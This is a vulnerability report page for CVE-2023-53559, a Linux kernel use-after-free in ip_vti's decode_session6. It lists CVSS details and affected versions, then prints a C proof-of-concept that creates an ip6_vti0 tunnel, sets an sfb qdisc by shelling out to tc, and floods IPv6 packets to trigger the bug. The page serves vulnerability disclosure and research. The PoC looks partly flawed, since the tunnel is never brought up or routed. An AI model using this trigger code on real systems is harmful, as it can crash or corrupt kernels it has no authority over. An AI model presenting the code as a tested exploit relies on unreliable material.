Security Vulnerability Report
CVE-2023-53559 CVSS 7.8 HIGH

CVE-2023-53559

Published: 2025-10-04 16:15:51
Last Modified: 2026-03-21 01:01:22
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

ip_vti: fix potential slab-use-after-free in decode_session6

When an ip_vti device is set to a qdisc of the sfb type, the cb field of the sent skb may be modified during enqueuing. A slab-use-after-free may then occur when the ip_vti device sends IPv6 packets. As commit f855691975bb ("xfrm6: Fix the nexthdr offset in _decode_session6.") showed, xfrm_decode_session was originally intended only for the receive path; IP6CB(skb)->nhoff is not set during transmission. Therefore, set the cb field in the skb to 0 before sending packets.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.6 (including the affected ip_vti module versions)
Linux Kernel 6.6.x (versions before the fix in commit 0b4d69539fdea138af2befe08893850c89248068)
Linux Kernel 6.1.x (versions before the fix in commit 2b05bf5dc437f7891dd409a3eaf5058459391c7a)
Linux Kernel 5.15.x (versions before the fix in commit 6018a266279b1a75143c7c0804dd08a5fc4c3e0b)
Linux Kernel 5.10.x (versions before the fix in commit 78e397a43e1c47321a4679cc49a6c4530bf820b9)
Linux Kernel 5.4.x (versions before the fix in commit 7dfe23659f3677c08a60a0056cda2d91a79c15ca)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
// CVE-2023-53559 PoC - Linux Kernel ip_vti slab-use-after-free
// Trigger: Create ip_vti tunnel with sfb qdisc and send IPv6 packets
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <arpa/inet.h>
#include <linux/if.h>
#include <linux/if_tunnel.h>   /* SIOCADDTUNNEL */
#include <linux/ip6_tunnel.h>  /* struct ip6_tnl_parm2 */

int main(int argc, char *argv[])
{
    int fd, tunnel_fd;
    struct ifreq ifr;
    struct ip6_tnl_parm2 p;

    // Step 1: Create an ip_vti6 tunnel device
    fd = socket(AF_INET6, SOCK_DGRAM, 0);
    if (fd < 0) {
        perror("socket");
        return 1;
    }

    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, "ip6_vti0", IFNAMSIZ - 1);

    memset(&p, 0, sizeof(p));
    p.proto = IPPROTO_IPV6;
    // Configure tunnel parameters (local/remote addresses)
    inet_pton(AF_INET6, "fd00::1", &p.laddr);
    inet_pton(AF_INET6, "fd00::2", &p.raddr);
    ifr.ifr_ifru.ifru_data = (void *)&p;

    if (ioctl(fd, SIOCADDTUNNEL, &ifr) < 0) {
        perror("ioctl SIOCADDTUNNEL");
        // Tunnel might already exist, try to use existing one
    }

    // Step 2: Set sfb qdisc on the tunnel device to trigger cb modification
    char cmd[256];
    snprintf(cmd, sizeof(cmd), "tc qdisc add dev ip6_vti0 root sfb");
    if (system(cmd) != 0) {
        fprintf(stderr, "Failed to set sfb qdisc\n");
    }

    // Step 3: Send IPv6 packets through the tunnel to trigger UAF
    tunnel_fd = socket(AF_INET6, SOCK_DGRAM, 0);
    if (tunnel_fd < 0) {
        perror("socket tunnel");
        return 1;
    }

    struct sockaddr_in6 dst;
    memset(&dst, 0, sizeof(dst));
    dst.sin6_family = AF_INET6;
    inet_pton(AF_INET6, "fd00::2", &dst.sin6_addr);

    // Send multiple packets to trigger the slab-use-after-free
    for (int i = 0; i < 1000; i++) {
        char payload[64];
        memset(payload, 'A' + (i % 26), sizeof(payload));
        if (sendto(tunnel_fd, payload, sizeof(payload), 0,
                   (struct sockaddr *)&dst, sizeof(dst)) < 0) {
            perror("sendto");
        }
    }

    printf("PoC executed - check kernel logs for slab-use-after-free\n");
    close(tunnel_fd);
    close(fd);
    return 0;
}
```

References

Raw JSON Data
